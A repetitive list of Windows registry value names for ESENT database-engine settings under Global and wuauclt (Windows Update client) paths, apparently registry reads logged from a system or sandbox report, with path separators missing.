HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogFileFailoverPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “BaseName”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “BaseName”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxSessions”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxSessions”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PreferredMaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PreferredMaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxCursors”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxCursors”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “GlobalMinVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “GlobalMinVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PreferredVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PreferredVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxTemporaryTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxTemporaryTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogFileSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogFileSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogBuffers”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogBuffers”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogCheckpointPeriod”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogCheckpointPeriod”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CommitDefault”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CommitDefault”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CircularLog”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CircularLog”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “DbExtensionSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “DbExtensionSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PageTempDBMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PageTempDBMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PageFragment”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PageFragment”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “VERTasksPostMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “VERTasksPostMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CacheSizeMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CacheSizeMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CacheSizeMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CacheSizeMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CheckpointDepthMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CheckpointDepthMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKCorrInterval”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKCorrInterval”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKHistoryMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKHistoryMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKPolicy”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKPolicy”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKTimeout”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKTimeout”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “StartFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “StartFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “StopFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “StopFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “ExceptionAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “ExceptionAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EventLogCache”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EventLogCache”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “Recovery”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “Recovery”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableOnlineDefrag”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableOnlineDefrag”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “AssertAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “AssertAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “RFS2IOsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “RFS2IOsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “RFS2AllocsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “RFS2AllocsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CheckFormatWhenOpenFail”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CheckFormatWhenOpenFail”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableIndexChecking”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableIndexChecking”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableTempTableVersioning”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableTempTableVersioning”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “ZeroDatabaseDuringBackup”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “ZeroDatabaseDuringBackup”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “IgnoreLogVersion”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “IgnoreLogVersion”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “DeleteOldLogs”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “DeleteOldLogs”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableImprovedSeekShortcut”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableImprovedSeekShortcut”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “BackupChunkSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “BackupChunkSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “BackupOutstandingReads”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “BackupOutstandingReads”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CreatePathIfNotExist”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CreatePathIfNotExist”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PageHintCacheSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PageHintCacheSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltCache Manager “Enable RO Cache Image”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalCache Manager “Enable RO Cache Image”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltCache Manager “Enable Opportune Writes”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalCache Manager “Enable Opportune Writes”
“GlobalFlags”
“Columns”
“Level”
“Flags”
“LogDir”
“LogFile”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltDEBUG “Trace Level”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalDEBUG “Trace Level”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionWindowsUpdate “ResetDataStoreReason”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltOSSLV “Space Grant Size (B)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalOSSLV “Space Grant Size (B)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltOSSLV “EA List Time-To-Live (ms)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalOSSLV “EA List Time-To-Live (ms)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “SystemPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “SystemPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “TempPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “TempPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogFilePath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogFilePath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogFileFailoverPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogFileFailoverPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “BaseName”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “BaseName”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxSessions”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxSessions”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PreferredMaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PreferredMaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxCursors”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxCursors”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “GlobalMinVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “GlobalMinVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PreferredVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PreferredVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxTemporaryTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxTemporaryTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogFileSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogFileSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogBuffers”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogBuffers”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogCheckpointPeriod”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogCheckpointPeriod”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CommitDefault”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CommitDefault”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CircularLog”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CircularLog”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “DbExtensionSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “DbExtensionSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PageTempDBMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PageTempDBMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PageFragment”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PageFragment”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “VERTasksPostMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “VERTasksPostMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CacheSizeMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CacheSizeMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CacheSizeMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CacheSizeMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CheckpointDepthMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CheckpointDepthMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKCorrInterval”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKCorrInterval”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKHistoryMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKHistoryMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKPolicy”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKPolicy”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKTimeout”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKTimeout”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “StartFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “StartFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “StopFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “StopFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “ExceptionAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “ExceptionAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EventLogCache”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EventLogCache”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “Recovery”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “Recovery”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableOnlineDefrag”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableOnlineDefrag”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “AssertAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “AssertAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “RFS2IOsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “RFS2IOsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “RFS2AllocsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “RFS2AllocsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CheckFormatWhenOpenFail”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CheckFormatWhenOpenFail”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableIndexChecking”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableIndexChecking”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableTempTableVersioning”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableTempTableVersioning”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “ZeroDatabaseDuringBackup”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “ZeroDatabaseDuringBackup”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “IgnoreLogVersion”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “IgnoreLogVersion”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “DeleteOldLogs”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “DeleteOldLogs”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableImprovedSeekShortcut”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableImprovedSeekShortcut”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “BackupChunkSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “BackupChunkSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “BackupOutstandingReads”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “BackupOutstandingReads”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CreatePathIfNotExist”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CreatePathIfNotExist”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PageHintCacheSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PageHintCacheSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltCache Manager “Enable RO Cache Image”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalCache Manager “Enable RO Cache Image”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltCache Manager “Enable Opportune Writes”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalCache Manager “Enable Opportune Writes”
“GlobalFlags”
“Columns”
“Level”
“Flags”
“LogDir”
“LogFile”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltDEBUG “Trace Level”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalDEBUG “Trace Level”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionWindowsUpdate “ResetDataStoreReason”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltOSSLV “Space Grant Size (B)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalOSSLV “Space Grant Size (B)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltOSSLV “EA List Time-To-Live (ms)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalOSSLV “EA List Time-To-Live (ms)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “SystemPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “SystemPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “TempPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “TempPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogFilePath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogFilePath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogFileFailoverPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogFileFailoverPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “BaseName”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “BaseName”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxSessions”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxSessions”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PreferredMaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PreferredMaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxCursors”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxCursors”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “GlobalMinVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “GlobalMinVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PreferredVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PreferredVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxTemporaryTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxTemporaryTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogFileSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogFileSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogBuffers”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogBuffers”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogCheckpointPeriod”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogCheckpointPeriod”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CommitDefault”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CommitDefault”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CircularLog”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CircularLog”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “DbExtensionSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “DbExtensionSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PageTempDBMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PageTempDBMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PageFragment”
